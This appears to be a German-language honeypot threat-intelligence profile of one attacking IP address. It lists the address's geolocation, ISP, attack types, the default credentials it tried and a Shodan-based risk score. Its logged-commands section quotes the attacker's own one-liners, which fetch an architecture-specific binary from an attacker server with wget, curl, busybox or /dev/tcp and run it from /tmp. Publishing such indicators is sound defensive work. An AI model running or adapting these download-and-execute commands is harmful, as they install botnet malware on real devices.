TROYANOSYVIRUS
Aktive BedrohungKRITISCH

83.142.209.48

Erste Erkennung2.3.2026
Letzte Aktivitat30.3.2026
ISPGhosty Networks LLC
🎯
53
Gesamtangriffe
🔌
6
Ports
📡
7
Angriffsarten
🦠
4
Malware

Geolokalisierung

Land
🇳🇱 Paises Bajos
Stadt
Unbekannt
ASN
AS205759
ISP
Ghosty Networks LLC

Angriffsarten

ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
malware_capture
web_honeypot
tcp_trap

Angegriffene Ports

238081237555556379

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/root
2x
🔐admin/admin
2x

Ausgefuhrte Befehle

$uname -m11x
$admin2x
$password2x
$cd /tmp;s=%s;p=%d;wget -q http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||curl -so .x http://$s:$p/$(uname -m)&&chmod +x .x&&./.x||busybox wget http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||wget -q http://$s:$p/dlr.$(uname -m) -O dlr&&chmod +x dlr&&./dlr||curl -so dlr http://$s:$p/dlr.$(uname -m)&&chmod +x dlr&&./dlr1x
$exec 3 <> /dev/tcp/83.142.209.47/801x
$while read l <& 31x
$/tmp/dlr1x
$cd /tmp;wget -q http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || curl -so .x http://83.142.209.47:80/$(uname -m) && chmod +x .x && ./.x || busybox wget http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || wget -q http://83.142.209.47:80/dlr.$(uname -m) -O dlr && chmod +x dlr && ./dlr || curl -so dlr http://83.142.209.47:80/dlr.$(uname -m) && chmod +x dlr && ./dlr1x
$exec 3<>/dev/tcp/83.142.209.47/80;echo -ne 'GET /dlr.'$(uname -m)' HTTP/1.0\r\n\r\n'>&3;while read l<&3;do [ -z "$l" ]&&break;done;cat<&3>/tmp/dlr;chmod +x /tmp/dlr;/tmp/dlr1x
$break1x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
226881
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risikobewertung

80
/100
NiedrigMittelHochKritisch